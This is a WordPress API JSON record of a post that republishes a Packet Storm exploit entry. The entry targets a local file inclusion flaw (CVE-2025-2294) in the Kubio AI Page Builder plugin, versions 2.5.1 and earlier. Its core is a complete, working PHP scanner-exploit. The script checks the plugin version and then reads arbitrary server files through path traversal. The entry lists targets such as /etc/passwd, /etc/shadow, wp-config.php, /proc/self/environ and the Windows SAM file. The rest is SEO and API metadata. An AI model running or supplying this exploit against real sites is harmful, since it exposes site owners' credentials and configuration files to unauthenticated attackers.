{"id":31890,"date":"2025-12-18T11:45:28","date_gmt":"2025-12-18T11:45:28","guid":{"rendered":"http:\/\/localhost\/?p=31890"},"modified":"2025-12-18T11:45:28","modified_gmt":"2025-12-18T11:45:28","slug":"kubio-ai-page-builder-251-php-lfi-extractor-scanner","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31890","title":{"rendered":"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022"},"content":{"rendered":"

{“lastseen”:”2025-12-18T16:37:55″,”description”:”A local file inclusion vulnerability exists in the function kubiohybridthemeloadtemplate of the Kubio AI Page Builder plugin for WordPress versions less than or equal to 2.5.1. An unauthenticated attacker may include arbitrary files via path traversal…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:213022″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-2294″,”CVE-2025-30208″],”sourceData”:”=============================================================================================================================================\\n | # Title : Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/downloads.wordpress.org\/plugin\/kubio.2.5.1.zip |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190227\/ \\u0026 \\tCVE-2025-30208\\n \\n [+] Summary \\n \\n A Local File Inclusion vulnerability exists in the function\\n `kubio_hybrid_theme_load_template` of the Kubio AI Page Builder plugin\\n for WordPress (versions \u2264 2.5.1). An unauthenticated attacker may include\\n arbitrary files via path traversal. This may lead to sensitive file\\n disclosure and can result in remote code execution when chained with\\n uploads.\\n \\n [+] Impact:\\n ——-\\n – Read arbitrary files\\n – Information disclosure\\n – Possible RCE chained with uploads\\n \\n [+] Run \\n \\n using: php poc.php https:\/\/target.com ..\/..\/..\/..\/..\/..\/etc\/passwd\\n \\n [+] Payload Variants\\n \\n Linux Sensitive Files\\n \\n \/etc\/passwd\\n \/etc\/shadow\\n \/var\/www\/html\/wp-config.php\\n \/proc\/self\/environ\\n \\n Windows Sensitive Files\\n \\n C:\\\\Windows\\\\win.ini\\n C:\\\\Windows\\\\repair\\\\SAM\\n C:\\\\xampp\\\\apache\\\\logs\\\\error.log\\n \\n WP Sensitive Files\\n \\n ..\/..\/..\/..\/..\/..\/wp-config.php\\n ..\/..\/..\/..\/..\/..\/wp-admin\/admin.php\\n \\n [+] poc\\n \\n \\n \\u003c?php\\n \/*\\n * Kubio AI Page Builder \\u003c= 2.5.1 – Local File Inclusion (LFI)\\n * PHP Scanner\\n * By: Indoushka\\n *\/\\n \\n error_reporting(E_ALL);\\n set_time_limit(0);\\n \\n function http_get($url) {\\n $ctx = stream_context_create([\\n ‘http’ =\\u003e [\\n ‘timeout’ =\\u003e 10,\\n ‘method’ =\\u003e \\”GET\\”,\\n ‘header’ =\\u003e \\”User-Agent: Indoushka-Scanner\/1.0\\\\r\\\\n\\”\\n ]\\n ]);\\n return @file_get_contents($url, false, $ctx);\\n }\\n \\n function parse_version($version) {\\n $p = explode(‘.’, $version);\\n while (count($p) \\u003c 3) $p[] = 0;\\n return array_map(‘intval’, array_slice($p, 0, 3));\\n }\\n \\n function check_plugin_version($target) {\\n $readme = rtrim($target, \\”\/\\”) . \\”\/wp-content\/plugins\/kubio\/readme.txt\\”;\\n $res = http_get($readme);\\n \\n if (!$res) return [false, \\”Cannot fetch readme.txt\\”];\\n \\n if (preg_match(‘\/Stable tag:\\\\s*([\\\\d\\\\.]+)\/i’, $res, $m)) {\\n $ver = trim($m[1]);\\n $parsed = parse_version($ver);\\n return [$parsed \\u003c= [2,5,1], $ver];\\n }\\n return [false, \\”Version not found\\”];\\n }\\n \\n function exploit($url, $file) {\\n $exploit = rtrim($url, \\”\/\\”) .\\n \\”\/?__kubio-site-edit-iframe-preview=1\\u0026__kubio-site-edit-iframe-classic-template=\\” .\\n urlencode($file);\\n \\n return http_get($exploit);\\n }\\n \\n function banner() {\\n echo \\”\\\\n=== Kubio AI Page Builder LFI PHP Scanner ===\\\\n\\”;\\n echo \\” CVE-2025-2294\\\\n\\”;\\n echo \\” By Indoushka\\\\n\\\\n\\”;\\n }\\n \\n banner();\\n \\n if ($argc \\u003c 2) {\\n echo \\”Usage:\\\\n\\”;\\n echo \\”php kubio_lfi.php \\u003curl\\u003e [file]\\\\n\\\\n\\”;\\n echo \\”Example:\\\\nphp kubio_lfi.php https:\/\/victim.com ..\/..\/..\/..\/..\/..\/etc\/passwd\\\\n\\”;\\n exit;\\n }\\n \\n $target = $argv[1];\\n $file = $argv[2] ?? \\”..\/..\/..\/..\/..\/..\/etc\/passwd\\”;\\n \\n list($vuln, $ver) = check_plugin_version($target);\\n \\n if ($vuln) {\\n echo \\”[+] Vulnerable version detected: $ver\\\\n\\”;\\n echo \\”[+] Exploiting…\\\\n\\”;\\n \\n $content = exploit($target, $file);\\n if ($content) {\\n echo \\”\\\\n===== FILE CONTENT START =====\\\\n\\”;\\n echo $content;\\n echo \\”\\\\n===== FILE CONTENT END =====\\\\n\\”;\\n } else {\\n echo \\”[-] Exploit failed or no output.\\\\n\\”;\\n }\\n } else {\\n echo \\”[-] Not vulnerable: $ver\\\\n\\”;\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213022″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213022\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-18T16:37:55″,”description”:”A local file inclusion vulnerability exists in the function kubiohybridthemeloadtemplate of the Kubio AI Page Builder plugin for WordPress versions less than or equal to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-31890","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31890\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-18T16:37:55″,”description”:”A local file inclusion vulnerability exists in the function kubiohybridthemeloadtemplate of the Kubio AI Page Builder plugin for WordPress versions less than or equal to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31890\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-18T11:45:28+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31890#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31890\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022\",\"datePublished\":\"2025-12-18T11:45:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31890\"},\"wordCount\":738,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31890#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31890\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31890\",\"name\":\"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-18T11:45:28+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31890#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31890\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31890#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31890","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022 - zero redgem","og_description":"{“lastseen”:”2025-12-18T16:37:55″,”description”:”A local file inclusion vulnerability exists in the function kubiohybridthemeloadtemplate of the Kubio AI Page Builder plugin for WordPress versions less than or equal to...","og_url":"https:\/\/zero.redgem.net\/?p=31890","og_site_name":"zero redgem","article_published_time":"2025-12-18T11:45:28+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31890#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31890"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022","datePublished":"2025-12-18T11:45:28+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31890"},"wordCount":738,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31890#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31890","url":"https:\/\/zero.redgem.net\/?p=31890","name":"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-18T11:45:28+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31890#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31890"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31890#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Kubio AI Page Builder 2.5.1 PHP LFI Extractor Scanner_PACKETSTORM:213022"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31890","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31890"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31890\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31890"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31890"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31890"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}